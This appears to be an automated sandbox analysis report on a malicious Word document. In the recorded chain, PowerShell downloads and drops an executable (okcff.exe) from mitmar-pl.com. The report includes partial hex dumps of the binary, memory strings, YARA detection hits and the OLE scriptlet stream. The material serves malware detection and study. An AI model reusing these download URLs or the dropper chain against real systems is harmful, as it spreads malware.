                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:18 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:22 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 09:23:23 GMTContent-Type: application/x-msdownloadContent-Length: 194560Last-Modified: Fri, 14 Jan 2022 05:56:32 GMTConnection: keep-aliveETag: "61e11090-2f800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/ok
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.ex
                    Source: powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpString found in binary or memory: httP://mitmar-pl.com/okcff.exePE
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://mitmar-pl.com
                    Source: okcff.exeString found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpeg
                    Source: okcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmpString found in binary or memory: http://mitmar-pl.com/Crkrqdrd.jpegi
                    Source: powershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.444532419.000000001B5C6000.00000004.00000001.sdmpString found in binary or memory: http://mitmar-pl.com/okcff.exe
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/cclean
                    Source: powershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: okcff.exeString found in binary or memory: https://google.com
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: https://google.com/
                    Source: okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: https://google.comD
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmpJump to behavior
                    Source: unknownDNS traffic detected: queries for: mitmar-pl.com
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /okcff.exe HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Crkrqdrd.jpeg HTTP/1.1Host: mitmar-pl.comConnection: Keep-Alive

                    System Summary:

                    barindex
                    Microsoft Office creates scripting filesShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Office process drops PE fileShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJump to dropped file
                    Document contains OLE streams with names of living off the land binariesShow sources
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660897/\x1Ole10Native' : 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660925/\x1Ole10Native' : $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Document contains a stream with embedded javascript codeShow sources
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660897/\x1Ole10Native' : Found JS content: 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<............................................................................................................................................................
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drStream path '_1703660925/\x1Ole10Native' : Found JS content: $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z.....................................................................................................................................
                    Powershell drops PE fileShow sources
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okcff.exeJump to dropped file
                    .NET source code contains very large array initializationsShow sources
                    Source: 41.0.okcff.exe.400000.5.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.7.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Source: 41.0.okcff.exe.400000.13.unpack, u003cPrivateImplementationDetailsu003eu007bFF1D0D87u002d84BBu002d46D1u002d97D2u002dB6B1FCD58796u007d/u003252DC26Eu002d1C55u002d40FBu002d95BAu002dCAC79903EF30.csLarge array initialization: .cctor: array initializer size 11933
                    Found suspicious RTF objectsShow sources
                    Source: abdtfhgXgeghDp.ScTStatic RTF information: Object: 0 Offset: 000007CDh abdtfhgXgeghDp.ScT
                    Source: 9.2.okcff.exe.334b4b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE indicator application name: unknown
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D2519
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D4D79
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02110940
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02110E00
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0218D148
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0218778F
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02184B98
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0218A8D0
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02187F38
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02188D88
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02189022
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02184EC8
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02185C80
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_021A4AB0
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A0E3
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542B370
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542AEC0
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A12A
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A807
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542A8F2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542AF82
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0542078A
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_00205330
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_00206350
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_00202099
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 41_2_00205678
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE indicator has summary info: false
                    Source: okcff[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: okcff.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\okcff.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76F90000 page execute and read and write
